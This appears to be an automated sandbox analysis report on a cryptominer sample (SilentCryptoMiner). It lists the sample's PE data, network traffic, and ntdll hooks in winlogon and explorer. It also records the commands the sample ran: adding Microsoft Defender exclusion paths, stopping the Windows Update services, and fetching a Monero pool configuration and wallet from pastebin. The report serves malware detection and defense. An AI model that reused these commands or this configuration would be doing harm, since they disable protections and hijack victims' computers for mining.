SSDEEP:	98304:iOKxam2uqpBZuVEqrPb/1wLpH6zjH5O8MJcZycvM+PvwwDqxmzN2TP4q:znvPZuVEqrPb/1YyZkJR+PYwmwS4q
TLSH:	AA56D0B98CE2587CC1274175DE10A4FB90177A4625AB7A1C8EE874A0CE257F96CC3F63
File Content Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.P...<Z................@..............................Z.......Z...`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x1400012fd
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x400032bc, 0x1, 0x400032a0, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	0bef0699ef655f5fd487ba3445b72f61

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	02/07/2021 02:00:00 11/07/2024 01:59:59
Subject Chain	CN=Google LLC, O=Google LLC, L=Mountain View, S=California, C=US
Version:	3
Thumbprint MD5:	DC429A22AA63D23DB8E84F53D05D1D48
Thumbprint SHA-1:	2673EA6CC23BEFFDA49AC715B121544098A1284C
Thumbprint SHA-256:	7D3D117664F121E592EF897973EF9C159150E3D736326E9CD2755F71E0FEBC0C
Serial:	0E4418E2DEDE36DD2974C3443AFB5CE5

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [005A2308h]
mov dword ptr [eax], 00000001h
call 00007FAADCCCBC23h
nop
nop
dec eax
add esp, 28h
ret
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [005A22EBh]
xor edx, edx
mov dword ptr [eax], edx
call 00007FAADCCCBC08h
nop
nop
dec eax
add esp, 28h
ret
dec eax
sub esp, 28h
call 00007FAADCCCE9C7h
dec eax
cmp eax, 01h
sbb eax, eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000005h]
jmp 00007FAADCCCBDDEh
ret
nop
nop
nop
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
inc ecx
push edi
inc ecx
push esi
inc ecx
push ebp
inc ecx
push esp
push ebp
push edi
push esi
push ebx
dec eax
sub esp, 48h
dec esp
mov esp, dword ptr [esp+000000B0h]
dec esp
mov ebp, dword ptr [esp+000000B8h]
dec esp
mov edi, dword ptr [esp+000000C0h]
dec esp
mov esi, dword ptr [esp+000000C8h]
dec eax
mov edi, ecx
dec eax
mov ecx, edx
dec esp
mov ebx, eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a8000	0x600	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5ab000	0x388	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x5a4000	0x624	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5a4000	0x2920
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5ac000	0x78	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5a3280	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5a81a0	0x160	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4fa8	0x5000	a62f38d5cd24be0d35d32d11d1b2ff4c	False	0.564599609375	data	6.2682042214234075	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x6000	0x59b080	0x59b200	b8d75992b46d00b4976920de88a59bf1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5a2000	0x1b20	0x1c00	818cf70b81476710bb2803d2617b6ffb	False	0.42982700892857145	data	4.543735601281149	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x5a4000	0x624	0x800	36489e9ddd9e8a030b9ea99cdbcd33d9	False	0.34423828125	data	3.709101691642188	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x5a5000	0x448	0x600	daeb69e5899810be08de821c316bb5e7	False	0.2526041666666667	data	3.047516790704977	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x5a6000	0x1860	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5a8000	0x600	0x600	ee456c3879aa465e41b58434a90eb578	False	0.369140625	data	4.149318836636945	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x5a9000	0x60	0x200	3c1f383e579a1bb4f38759caba324c9a	False	0.06640625	data	0.27950974526108024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5aa000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5ab000	0x388	0x400	fd865177d35e778ae6783d215a70b0ca	False	0.4521484375	data	5.023865484975868	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5ac000	0x78	0x200	03879146f72267310b9358bcf48631f7	False	0.24609375	data	1.481711020080349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x5ab058	0x330	XML 1.0 document, ASCII text	English	United States	0.508578431372549

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
msvcrt.dll	__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, fputs, free, malloc, signal, strcat, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr, _wcsnicmp, _wcsicmp

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T23:26:04.974237+0100	2054247	ET MALWARE SilentCryptoMiner Agent Config Inbound	1	172.67.19.24	443	192.168.2.6	49701	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 23:26:02.901072979 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:02.905898094 CET	10343	49700	54.37.137.114	192.168.2.6
Jan 2, 2025 23:26:02.906102896 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:02.906488895 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:02.911252022 CET	10343	49700	54.37.137.114	192.168.2.6
Jan 2, 2025 23:26:03.546416998 CET	10343	49700	54.37.137.114	192.168.2.6
Jan 2, 2025 23:26:03.546433926 CET	10343	49700	54.37.137.114	192.168.2.6
Jan 2, 2025 23:26:03.547832966 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:03.547832966 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:03.552639961 CET	10343	49700	54.37.137.114	192.168.2.6
Jan 2, 2025 23:26:03.739054918 CET	10343	49700	54.37.137.114	192.168.2.6
Jan 2, 2025 23:26:03.791413069 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:03.866161108 CET	10343	49700	54.37.137.114	192.168.2.6
Jan 2, 2025 23:26:03.916423082 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:03.950306892 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:03.950329065 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:03.950673103 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:03.964618921 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:03.964638948 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:03.984087944 CET	10343	49700	54.37.137.114	192.168.2.6
Jan 2, 2025 23:26:04.025795937 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:04.433032990 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:04.434703112 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:04.434716940 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:04.435959101 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:04.436043024 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:04.438218117 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:04.438285112 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:04.438461065 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:04.438476086 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:04.478916883 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:04.974041939 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:04.974126101 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:04.974208117 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:04.979269981 CET	49701	443	192.168.2.6	172.67.19.24
Jan 2, 2025 23:26:04.979295015 CET	443	49701	172.67.19.24	192.168.2.6
Jan 2, 2025 23:26:04.981048107 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:04.981084108 CET	49700	10343	192.168.2.6	54.37.137.114
Jan 2, 2025 23:26:04.981585979 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:04.987406015 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:04.987493992 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:05.025126934 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:05.030843019 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:05.585097075 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:05.585113049 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:05.585861921 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:05.585861921 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:05.590666056 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:05.756432056 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:05.807183981 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:05.889571905 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:05.933927059 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:14.165816069 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:14.291431904 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:24.096678972 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:24.291552067 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:38.093383074 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:38.291538954 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:26:48.129981995 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:26:48.171700954 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:27:00.095344067 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:27:00.135395050 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:27:10.089168072 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:27:10.260329962 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:27:20.155376911 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:27:20.369716883 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:27:30.348556995 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:27:30.572843075 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:27:41.100311041 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:27:41.260369062 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:27:51.146579981 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:27:51.260436058 CET	49703	10343	192.168.2.6	51.15.58.224
Jan 2, 2025 23:28:01.184386015 CET	10343	49703	51.15.58.224	192.168.2.6
Jan 2, 2025 23:28:01.232129097 CET	49703	10343	192.168.2.6	51.15.58.224

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 23:26:02.888428926 CET	53876	53	192.168.2.6	1.1.1.1
Jan 2, 2025 23:26:02.896998882 CET	53	53876	1.1.1.1	192.168.2.6
Jan 2, 2025 23:26:03.942327976 CET	63988	53	192.168.2.6	1.1.1.1
Jan 2, 2025 23:26:03.949212074 CET	53	63988	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 23:26:02.888428926 CET	192.168.2.6	1.1.1.1	0xbd09	Standard query (0)	xmr-eu1.nanopool.org	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:03.942327976 CET	192.168.2.6	1.1.1.1	0xc059	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	54.37.137.114	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	146.59.154.106	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	162.19.224.121	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	141.94.23.83	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	51.15.58.224	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	163.172.154.142	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	212.47.253.124	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	51.15.65.182	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	54.37.232.103	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	51.15.193.130	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:02.896998882 CET	1.1.1.1	192.168.2.6	0xbd09	No error (0)	xmr-eu1.nanopool.org	51.89.23.91	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:03.949212074 CET	1.1.1.1	192.168.2.6	0xc059	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:03.949212074 CET	1.1.1.1	192.168.2.6	0xc059	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Jan 2, 2025 23:26:03.949212074 CET	1.1.1.1	192.168.2.6	0xc059	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49701	172.67.19.24	443	5536	C:\Windows\System32\dialer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 22:26:04 UTC	114	OUT	GET /raw/mJdpKdhr HTTP/1.1 Accept: / Connection: close Host: pastebin.com User-Agent: cpp-httplib/0.12.6
2025-01-02 22:26:04 UTC	391	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 22:26:04 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Thu, 02 Jan 2025 22:26:04 GMT Server: cloudflare CF-RAY: 8fbe2b2a3ec7f5f6-EWR
2025-01-02 22:26:04 UTC	483	IN	Data Raw: 31 64 63 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 31 30 33 34 33 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 42 42 6f 65 6e 75 39 4b 77 36 5a 6f 74 67 35 65 73 76 4d 58 50 32 33 38 62 76 55 74 47 69 73 47 63 61 51 37 56 53 4b 63 6b 76 53 4e 39 6f 76 5a 6b 52 6a 64 73 48 36 4a 31 62 32 55 76 6a 37 44 51 4a 34 71 66 6d 65 5a 64 69 78 72 67 36 73 73 70 38 70 72 32 59 38 37 43 55 4b 51 39 64 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c Data Ascii: 1dc{ "algo": "rx/0", "pool": "xmr-eu1.nanopool.org", "port": 10343, "wallet": "4BBoenu9Kw6Zotg5esvMXP238bvUtGisGcaQ7VSKckvSN9ovZkRjdsH6J1b2Uvj7DQJ4qfmeZdixrg6ssp8pr2Y87CUKQ9d", "password": "", "nicehash": false, "ssltl
2025-01-02 22:26:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
ZwResumeThread	INLINE	winlogon.exe, explorer.exe
NtDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
ZwDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
NtEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe
ZwEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
NtResumeThread	INLINE	winlogon.exe, explorer.exe
RtlGetNativeSystemInformation	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
NtEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe

Processes

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	17:25:52
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\hiwA7Blv7C.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\hiwA7Blv7C.exe"
Imagebase:	0x7ff727270000
File size:	5'925'152 bytes
MD5 hash:	7BF019893EB8DF6FC169E8F9EF5269C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:25:52
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:25:52
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff7255e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff7e6e10000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	17:25:56
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
